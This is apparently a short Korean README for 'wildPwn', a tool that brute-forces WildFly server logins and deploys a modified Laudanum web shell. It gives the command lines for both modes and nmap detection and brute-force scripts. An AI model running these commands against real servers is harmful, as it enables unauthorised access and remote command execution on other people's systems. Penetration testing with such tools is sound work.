
WildFly용 무차별 대입 공격기 및 쉘 배포기
WildFly를 위한 도구입니다. 이 도구는 무차별 대입 공격(brute force) 또는 셸 배포(shell deploy)에 사용될 수 있습니다. wildPwn.war에는 수정된 Laudanum Shell이 포함되어 있습니다. userList.txt에는 일반적인 사용자 이름 목록이, passList.txt에는 일반적인 비밀번호 목록이 포함되어 있습니다.
무차별 대입 공격
python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST>
셸 배포
python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>
https://artofpwn.com/wildfly-exploitation.html
탐지
nmap --script wildfly-detect <TARGET>
무차별 대입 공격
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>